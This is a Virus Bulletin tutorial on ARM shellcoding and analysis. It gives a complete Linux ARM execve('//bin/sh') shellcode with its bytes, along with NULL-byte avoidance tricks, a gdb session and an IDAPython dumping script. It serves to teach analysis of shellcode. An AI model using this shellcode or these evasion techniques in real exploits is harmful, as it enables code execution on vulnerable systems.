Shellcoding ARM: part 2

2013-03-04

Aleksander P. Czarnowski

AVET Information and Network Security, Poland

Editor: Helen Martin

Abstract

In the first part of this series Aleksander Czarnowski covered the background information needed to understand the principles of ARM shellcoding. In this follow-up article he moves on to dissect some previously crafted shellcode.

Table of contents


The GetPC problem
API calling conventions
A simple construction to avoid NULL bytes
Testing our shellcode on a real target
Analysing shellcode with IDA Pro
Dumping the shellcode from the executable
Summary

In the first part of this series [1] we discussed the basic background information needed to understand the principles of ARM shellcoding. In this follow-up article we will dissect some previously crafted shellcode.

The GetPC problem

The shellcode techniques we’ve discussed so far have a couple of requirements:

The code must be position independent (PIC).
The shellcode data (such as parameters for syscalls) must be positioned at the end of the code section.

This raises the issue of how to determine the Program Counter (PC) value. This value can be used to calculate the offset to the shellcode data and other crucial areas such as encrypted code (this will be discussed in more detail in the next article).

Figure 1 shows the most basic shellcode layouts:

Figure 1. Basic shellcode layouts.

What is missing from Figure 1 is a return address, but since this section is random in the sense that it changes from vulnerability to vulnerability (and even between system revisions), we can’t predict it, and it is outside the scope of this article.

To better illustrate the GetPC problem, let’s compare x86 shellcode techniques with ARM ones.

In x86 architecture, the two most popular ‘GetPC’ constructions are:

JMP/CALL/POP reg trampoline code
Use of FSTENV

As shown in Table 1, the trampoline code is quite simple. The POP ECX instruction returns the EIP value, which is a pointer to the shellcode data section since the address pushed onto the stack by the CALL instruction points to the next instruction after the CALL opcode. However, in our case there is no valid code there, just data.

Address	Instructions
0	JMP start
+5 (rstart)	POP ECX
[…]	Rest of the shellcode
Start	CALL rstart (+5)
start+5	Shellcode data section

Table 1. Trampoline code.

One might wonder why, besides the pointer to the shellcode data section, we need the first JMP instruction. The reason is bad bytes. Consider the following code:

CALL $+4
POP  ECX

The call instruction will be assembled as:

E800000000

There are clearly too many bad bytes to deal with such opcode in the case of shellcode.

The second trick is based on the FPU instruction FSTENV, which saves the FPU and part of the CPU state in memory. In protected mode, 28 bytes of memory are needed to store the saved state:

Address	Instructions
0	FLDZ
+2	FSTENV SS:[ESP-0xC]
+6	POP ECX

Table 2. The FPU instruction FSTENV saves the FPU and part of the CPU state in memory.

After the code shown above has been executed, the ECX register contains the address of the FLDZ instruction.

It is worth mentioning that both methods are system independent, unlike methods based on Structured Exception Handling (SEH) which only work under Windows, for example. It should not come as a surprise, therefore, that ARM shellcode can also be written in such a way that enables execution under different operating systems. Obviously the API calling convention changes from platform to platform, but the shellcode framework can be reused in such cases.

So how is it done on the ARM platform? There are a number of features of ARM architecture that particularly appeal to shellcode authors – one of which is the ability to switch between ARM and Thumb modes and the fact that this process does not require any special preparation (unlike switching between real and protected mode on x86 CPU, for example). Why is this feature so important to shellcode authors? Since the Thumb/Thumb2 instruction set is 16 bits long, the instruction encodings are not only shorter (shorter shellcode means more flexible and more reliable shellcode), but as a side effect, many bad bytes are eliminated. We will discuss this in more detail later in the article.

API calling conventions

To understand all the shellcode presented here we first need to understand the Linux API calling convention, which is a reflection of the ARM calling convention.

Let’s start with the Linux execve() calling structure:

R0 must point to the ‘//bin/sh’ string
R1 must point to the ‘//bin/sh’ string
R2 must be set to 0
R7 must contain the SYSCALL number, which is 0x0b (11) for Linux execve().

Now if you take a look at the shellcode in Table 3, you will see that most parts of it are preparations for the syscall.

Address	Bytes	Instructions	Comment
0	e28f6001	add r6, pc, #1	This is an ARM-type GetPC construction based on jump.
+4	e12fff16	bx r6	The BX instruction not only sets PC to the R6 value, but also switches ARM into Thumb mode.
+8	4678	mov r0, pc	This is the second part of the GetPC construction – now R0 contains the current offset of the shellcode. Note that from this point on, the shellcode is executing in Thumb mode.
+A	300a	adds r0, #10	The R0 register value is adjusted to point to the data section (R0 points to the +16 address) – points to //bin/sh string.
+C	9001	str r0, [sp, #4]	The section data pointer is placed on the stack.
+E	a901	add r1, sp, #4	R1 = SP+4 – points to the //bin/sh string.
+10	1a92	subs r2, r2, r2	The R2 register is zeroed out (R2 = 0). Subs r2, r2, r2 is used in order to avoid bad bytes.
+12	270b	movs r7, #11	R7 contains the Linux SYSCALL number (0x0B = execve).
+14	df01	svc 1	Linux SYSCALL.
+16		//bin/sh	Data section for execve SYSCALL.

Table 3. Shellcode instructions.

A simple construction to avoid NULL bytes

As described in [1], NULL bytes are bad bytes because they terminate C-string-based functions. When exploiting even the most basic buffer overflow vulnerability using the insecure strcpy() function, the attacker does not want his shellcode to be partially copied into memory because it will crash the target process during execution (setting aside safeguards such as a non-executable stack and ASLR). This means that the final shellcode must not contain any NULL bytes. However, as noted earlier, NULL bytes are C string delimiters, and in the case of Linux they are used to mark the end of strings passed to glibc and kernel functions, for example. One solution to the problem is to patch bytes that are C string delimiters during runtime so that their value turns to 0 only after the shellcode has gained control over the currently executing context. However, simply loading a 0 value directly into the register will not work:

mov r7, #0

and

ldr r5, #0

result in bad bytes. Shellcoders use a couple of tricks to eliminate this problem. We’ve already seen one such trick at offset +10 of our shellcode – to load 0 into the R2 register the following instruction is used:

subs r2, r2, r2

Sometimes, instead of the subs rx, rx, rx stream of instructions, a different construction is used to zero out registers:

subs rx, rx, rx
mov ry, rx
mov rz, rx

where x, y and z are register numbers. However, this trick might not work with the R0 register in ARM mode, since such instructions can be encoded with bad bytes.

The result of this subtraction operation is stored in the R2 register and the R2 register value is subtracted from the R2 register value. The result is the required zero.

Another obvious trick is to employ the exclusive-or (eor) operation on the same register:

eor r2, r2

You might also be wondering why our shellcode uses the BX instruction to make a branch in the shellcode. After all, the PC register is accessible and its value can be stored in any other general-purpose register using a simple mov instruction (as happens at the +8 offset). The reason lies in the additional functionality of the BX instruction. It not only jumps to a given location (setting PC to an appropriate value), but it also switches from the ARM instruction set to the Thumb instruction set, which happens to be shorter. This allows the SVC instruction to be two bytes long instead of the longer, 32 bit ARM version, which in turn can contain bad bytes. We will return to this discussion later.

Testing our shellcode on a real target

In order to make our simple shellcode work within the C wrapper presented in [1] we need to get rid of the non executable stack. In order to do that we use the z execstack switch (without the -z execstack option the application could shut down with a ‘segmentation fault’ error):

gcc -z execstack -o 21253-raspi-execve.exe 21253-raspi-execve.c

Now we will be able to execute the shellcode. Note that if you do not plan to run the shellcode but just get a compiled byte stream for further analysis, you can safely skip this step. In fact, the non-executable stack has no direct impact on debugging when using IDA Pro with qemu. However, if you plan to debug/analyse shellcode directly with on target architecture, the non executable stack should be disabled.

You might be surprised to learn that when trying to debug our example code with gdb it fails after the BX instruction. The reason is that gdb does not currently support Thumb2 instructions out of the box [2]. Gdb’s lack of support for Thumb2 is a good reason to switch to IDA Pro. However, gdb will be sufficient just to examine the resulting ELF binary and to find out how parameters are passed and how the shellcode is called at an assembly level. In order to do this we must:

Load the program binary into memory and set a breakpoint at the main() function (break main).
Run the program to catch the first breakpoint (run).
Disassemble the main function (disassemble).
Set a breakpoint at the call to our shellcode (break *0x0846c).
Continue program execution (cont).
Execute a single instruction (si) to enter our shellcode.
Get the CPU status (info registers).

Listing 1 shows a simple gdb session. As you can see, we are able to locate our shellcode in memory and to determine how it is called. The reason we have discussed gdb in detail is because it is available on all Linux systems on different platforms. However, the rest of our work will be done with IDA Pro.

gdb –q ./nostack-21253-raspi-execve.exe
Reading symbols from /tmp/nostack-21253-raspi-execve.exe...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x8428
(gdb) run
Starting program: /tmp/nostack-21253-raspi-execve.exe

Breakpoint 1, 0x00008428 in main ()
(gdb) disassemble
Dump of assembler code for function main:
=> 0x00008428 <+0>:   push {r4, r5, r11, lr}
   0x0000842c <+4>:   add  r11, sp, #12
   0x00008430 <+8>:   ldr  r3, [pc, #68] ; 0x847c <main+84>
   0x00008434 <+12>:  ldr  r3, [r3]
   0x00008438 <+16>:  mov  r5, r3
   0x0000843c <+20>:  ldr  r4, [pc, #60] ; 0x8480 <main+88>
   0x00008440 <+24>:  ldr  r3, [pc, #60] ; 0x8484 <main+92>
   0x00008444 <+28>:  ldr  r3, [r3]
   0x00008448 <+32>:  mov  r0, r3
   0x0000844c <+36>:  bl   0x8358 <strlen>
   0x00008450 <+40>:  mov  r3, r0
   0x00008454 <+44>:  mov  r0, r5
   0x00008458 <+48>:  mov  r1, r4
   0x0000845c <+52>:  mov  r2, r3
   0x00008460 <+56>:  bl   0x8364 <fprintf>
   0x00008464 <+60>:  ldr  r3, [pc, #24] ; 0x8484 <main+92>
   0x00008468 <+64>   ldr  r3, [r3]
   0x0000846c <+68>:  blx  r3  <= this is a call to our shellcode from the C wrapper
   0x00008470 <+72>:  mov  r3, #0
   0x00008474 <+76>:  mov  r0, r3
   0x00008478 <+80>:  pop  {r4, r5, r11, pc}
   0x0000847c <+84>:  andeq r0, r1, r0, ror #12
   0x00008480 <+88>:  andeq r8, r0, r12, lsl r5
   0x00008484 <+92>:  andeq r0, r1, r12, asr r6
End of assembler dump.
(gdb) break *0x0846c
Breakpoint 2 at 0x846c
(gdb) cont
Continuing.
Length: 30

Breakpoint 2, 0x0000846c in main ()
(gdb) si
0x000084f8 in ?? ()
(gdb) info registers
r0  0xb  11
r1  0x1  1
r2  0x0  0
r3  0x84f8  34040
r4  0x851c  34076
r5  0x401685e0 1075217888
r6  0x837c  33660
r7  0x0  0
r8  0x0  0
r9  0x0  0
r10 0x40026000 1073897472
r11 0xbefff6a4 3204445860
r12 0x40168030 1075216432
sp  0xbefff698 0xbefff698
lr  0x8470  33904
pc  0x84f8  0x84f8 <= our shellcode address
cpsr 0x60000010 1610612752

Listing 1: Simple gdb session.

Analysing shellcode with IDA Pro

IDA Pro has several great features that target ARM architecture, and when these are combined with IDAPython and other neat functionality, it makes an excellent tool for analysis.

Let’s start by loading our binary with shellcode into IDA. Select the file and choose ARM as the target CPU. When IDA loads the file it displays the warning shown in Figure 2 about the ARM and Thumb instruction sets. Since IDA might not automatically be able to distinguish which instruction set is being used, and to provide the user with the ability to switch manually between modes, it provides a virtual register, T (Figure 3), which when set to 1 defines Thumb opcode (16 bit) and when set to 0 signifies ARM (32-bit) mode. Thanks to this feature you can switch back and forth from Thumb to ARM during disassembly of your code. Of course, when IDA is able to detect the mode switch (by tracing the BX instruction target, for example), it adjusts the T register value accordingly.

Figure 2. Warning about the Thumb and ARM instruction sets.

Figure 3. Virtual segment register T value definition – it should reflect the T bit of the processor state register (CPSR).

Next let’s try to locate our shellcode. We’ve already got an address from the gdb session: 0x084F8. However, the exact address displayed in IDA Pro will be: .rodata:000084F8 (for the ‘Jump to address’ command we can still pass the 0x084F8 value without knowing which ELF section we are looking for). If we hadn’t got the address from the gdb experiment, we could use IDA to help us locate our byte stream. Since we’ve used GCC, IDA is able to identify functions, and the main() function is displayed in the ‘Function name’ window. Click on ‘main’ to jump to it. Next, scroll down and look for a branch with link instruction, since our C wrapper is using the call ‘(*(void(*)()) SC)();’ to transfer execution to the SC table. Figure 4 shows a disassembly provided by IDA.

Figure 4. Shellcode call from C wrapper.

If you jump to the SC symbol (by clicking on it) you will not find our shellcode yet, but the data shown in Figure 5.

Figure 5. SC symbol definition.

Obviously the disassembly is wrong, since this is data rather than code. However, if you convert it to data (using the D key) you will get: DCD 0x84F8. This is a more reasonable interpretation. The process should not come as a surprise since in C code we were using pointers, so the SC variable contains the address to our shellcode rather than the shellcode itself.

When we have the address of the shellcode we can jump to it – see Figure 6.

Figure 6. Our execve shellcode disassembly in IDA Pro.

As you can see, the shellcode starts at 0x84F8 and the shellcode data section starts from 0x850E – this contains the string for the execve() call. The call to the execve() function is at 0x850C. Note how the SVC 1 instruction is encoded so there are no bad bytes.

As a side note, when I’m disassembling and analysing shellcode within IDA I always mark its start and end by renaming those locations (using the ‘N’ key in disassembly view). I always use the names ‘SHELLCODE_START’ and ‘SHELLCODE_END’, but the names can be anything as long as you can memorize them – such marks may be helpful later during analysis. Keep in mind that calculating the start and end of shellcode can be quite tricky – here, we are using a C wrapper to test the shellcode, but in a real life scenario you may have a malware sample that sends packets over the network and there will be no hints such as symbols or even BLX instructions.

If you take a look at our shellcode entry point once more you will notice another important thing: it starts with ARM instructions and switches to Thumb2 mode using BX. Note how the ARM and Thumb/Thumb2 instructions are encoded:

All ARM opcodes (32-bit) occupy exactly four bytes
All Thumb/Thumb2 opcodes (12-bit) occupy exactly two bytes.

This explains why shellcode written in Thumb mode is shorter. Besides the previously mentioned SVC instruction coding issue in ARM mode there is another construction that causes problems due to the generation of bad bytes: the R0 register. Take a look at the following instruction samples and their encodings:

06 00 A0 E1   MOV R0, R6
00 60 A0 E1   MOV R6, R0
03 00 A0 E1   MOV R0, R3
05 00 A0 E1   MOV R0, R5
00 30 90 E5   LDR R3, [R0]
0C 00 9F E5   LDR R0, =main
04 00 2D E5   STR R0, [SP,#-4]!

As you can see, in most cases use of the R0 register in ARM mode ends with a NULL byte. Why don’t the MOV R0, PC instructions from our shellcode contain any bad bytes? The reason is that there is a difference in encoding between the 32 bit and 16 bit instruction sets. In our case the MOV R0, PC instruction is for Thumb2 mode and therefore it occupies only two bytes instead of ARM’s four bytes as in the examples above, and the resulting encoding does not use a zero byte value. When constructing shellcode you have to remember that other instructions might also generate bad bytes, even without referencing the R0 register – for example:

00 30 93 E5  LDR R3, [R3]

If you have problems calculating the correct shellcode end address, in most cases you can dump memory up to the first occurrence of a NULL byte or any other type of bad byte. In most cases properly working shellcode will not contain any type of bad bytes.

Dumping the shellcode from the executable

We’ve done a lot to get to our shellcode – debugging it further with all the additional C code such as runtime libraries is pointless. The idea of the previous exercise was to demonstrate how to extract the shellcode with IDA Pro by locating it within the ELF binary.

Now let’s dump our shellcode into a simple, flat binary file. In the case of emulating an execution environment, usually the simpler the things we load into it, the better the results.

There are many ways to achieve this goal. The method I’ve used is not the simplest, but it demonstrates the power and possible usage of IDAPython. We will use the Python script presented in Listing 2. Save this as ‘dumpshellcode128b.py’ and place the cursor at the beginning of the shellcode. Starting from the cursor position, the next 128 bytes will be saved to the ‘shelldump.bin’ file. To get the current cursor position (which, from IDA’s perspective, is an address) we use the ScreenEA() function. To access the byte at the address we use the Byte() function. Both are provided by IDAPython, the rest is pure Python code. (Note that the script is for illustration purposes only. It lacks error checking and exception handling; it could use name markers for calculating size of dump, etc.)

shelldump = ‘’
dump_size = 128
ea = ScreenEA()
print ‘Dumping %02d bytes starting from address: 0x%X’ % (ea, dump_size)
for ea in range (ea, ea + dump_size):
    print ‘%02X’ % Byte(ea),
    shelldump += ‘%c’ % Byte(ea)
if len(shelldump) > 0:
    print ‘Writing shelldump.bin file’
    fin = open(‘shelldump.bin’,’w+b’)
    fin.write(shelldump)
    fin.close()

Listing 2: Python script saved as ‘dumpshellcode128b.py’.

By changing the dump_size variable you can control how many bytes will be dumped to the file.

Summary

All of what we’ve done so far has been in preparation for a more challenging task: analysing polymorphic ARM shellcode with IDA Pro. We will look at this in depth in the next part of the series.

Bibliography

[1] Czarnowski, A. Shellcoding ARM. Virus Bulletin, January 2013, p.9. http://www.virusbtn.com/pdf/magazine/2013/201301.pdf.

[2] Myers, J. S. Fix ARM stepping over Thumb-mode ‘bx pc’ or ‘blx pc’. Sourceware.org. http://sourceware-org.1504.n7.nabble.com/Fix-ARM-stepping-over-Thumb-mode-quot-bx-pc-quot-or-quot-blx-pc-quot-td69213.html.

Latest articles:

Nexus Android banking botnet – compromising C&C panels and dissecting mobile AppInjects

Aditya Sood & Rohit Bansal provide details of a security vulnerability in the Nexus Android botnet C&C panel that was exploited to compromise the C&C panel in order to gather threat intelligence, and present a model of mobile AppInjects.

Cryptojacking on the fly: TeamTNT using NVIDIA drivers to mine cryptocurrency

TeamTNT is known for attacking insecure and vulnerable Kubernetes deployments in order to infiltrate organizations’ dedicated environments and transform them into attack launchpads. In this article Aditya Sood presents a new module introduced by…

Collector-stealer: a Russian origin credential and information extractor

Collector-stealer, a piece of malware of Russian origin, is heavily used on the Internet to exfiltrate sensitive data from end-user systems and store it in its C&C panels. In this article, researchers Aditya K Sood and Rohit Chaturvedi present a 360…

Fighting Fire with Fire

In 1989, Joe Wells encountered his first virus: Jerusalem. He disassembled the virus, and from that moment onward, was intrigued by the properties of these small pieces of self-replicating code. Joe Wells was an expert on computer viruses, was partly…

Run your malicious VBA macros anywhere!

Kurt Natvig wanted to understand whether it’s possible to recompile VBA macros to another language, which could then easily be ‘run’ on any gateway, thus revealing a sample’s true nature in a safe manner. In this article he explains how he recompiled…

Bulletin Archive